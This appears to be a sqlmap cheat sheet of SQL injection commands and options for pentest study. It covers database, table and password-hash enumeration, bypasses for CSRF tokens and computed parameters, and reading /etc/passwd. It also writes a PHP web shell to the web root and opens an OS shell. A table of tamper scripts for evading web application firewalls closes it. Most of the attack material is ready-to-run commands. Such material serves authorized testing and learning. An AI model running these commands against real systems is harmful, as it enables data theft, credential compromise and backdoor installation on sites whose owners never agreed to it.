sqlmap
// sqlmap tips
Display Errors
The first step is usually to switch the --parse-errors,
to parse the DBMS errors (if any) and displays them as part of the program run:
// The -t option stores the whole traffic content to an output file:
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
// Another useful flag is the -v option, which raises the verbosity level of
the console output:
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
// As we can see, the -v 6 option will directly print all errors and
//full HTTP request to the terminal so that we can follow along with everything
// SQLMap is doing in real-time.
//Finally, we can utilize the --proxy option to redirect the whole traffic through
//a (MiTM) proxy (e.g., Burp). This will route all SQLMap traffic through Burp,
//so that we can later manually investigate all requests, repeat them, and
//utilize all features of Burp with these requests:
//boundaries (e.g. '<vector>-- -): prefix and suffix formations,
// used for proper injection of the vector into the vulnerable SQL statement.
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
// This will result in an enclosure of all vector values between the
// static prefix %')) and the suffix -- -.
$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "'))
LIMIT 0,1";
$result = mysqli_query($link, $query);
//
The option --level (1-5, default 1) extends both vectors and boundaries being used,
based on their expectancy of success (i.e., the lower the expectancy,
the higher the level).
The option --risk (1-3, default 1) extends the used vector set based on their risk
of causing problems at the target side (i.e., risk of database entry loss or
denial-of-service).
sqlmap -u www.example.com/?id=1 -v 3 --level=5
// As for the number of payloads, by default (i.e. --level=1 --risk=1), the number of payloads used for testing a single parameter goes up to 72, while in the most detailed case (--level=5 --risk=3)
// the number of payloads increases to 7,865.
As for the number of payloads, by default (i.e. --level=1 --risk=1),
As SQLMap is already tuned to check for the most common boundaries and vectors,
regular users are advised not to touch these options because it will make
the whole detection process considerably slower. Nevertheless, in special cases
of SQLi vulnerabilities, where usage of OR payloads is a must
(e.g., in case of login pages), we may have to raise the risk level ourselves.
This is because OR payloads are inherently dangerous in a default run,
where underlying vulnerable SQL statements (although less commonly)
are actively modifying the database content (e.g. DELETE or UPDATE).
Techniques
--technique=BEU
Enumeration usually starts with the retrieval of the basic information:
Database version banner (switch --banner)
Current user name (switch --current-user)
Current database name (switch --current-db)
Checking if the current user has DBA (administrator) rights.
// narrow down
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3
// search table names
// searching tables LIKE 'user'
sqlmap -u "http://www.example.com/?id=1" --search -T user
// search column names
sqlmap -u "http://www.example.com/?id=1" --search -C pass
// DB Users Password Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
//CSRF
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
// unique value bypass
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
// Calculated Parameter Bypass
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
// proxy
--proxy="socks4://177.39.187.70:33283"
// check if DBA
sqlmap -u "http://www.example.com/?id=1" --is-dba
// reading local files
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
// write file
echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
sqlmap -u "http://www.example.com/?id=1" --os-shell
Tamper Scripts
--tamper
Tamper-Script
Description
0eunion
Replaces instances of UNION with e0UNION
base64encode
Base64-encodes all characters in a given payload
between
Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #
commalesslimit
Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart
equaltolike
Replaces all occurrences of operator equal (=) with LIKE counterpart
halfversionedmorekeywords
Adds (MySQL) versioned comment before each keyword
modsecurityversioned
Embraces complete query with (MySQL) versioned comment
modsecurityzeroversioned
Embraces complete query with (MySQL) zero-versioned comment
percentage
Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
plus2concat
Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart
randomcase
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
space2comment
Replaces space character ( ) with comments `/
space2dash
Replaces space character ( ) with a dash comment (--) followed by a random string and a new line ()
space2hash
Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line ()
space2mssqlblank
Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters
space2plus
Replaces space character ( ) with plus (+)
space2randomblank
Replaces space character ( ) with a random blank character from a valid set of alternate characters
symboliclogical
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
versionedkeywords
Encloses each non-function keyword with (MySQL) versioned comment
versionedmorekeywords
Encloses each keyword with (MySQL) versioned comment
Last updated
Was this helpful?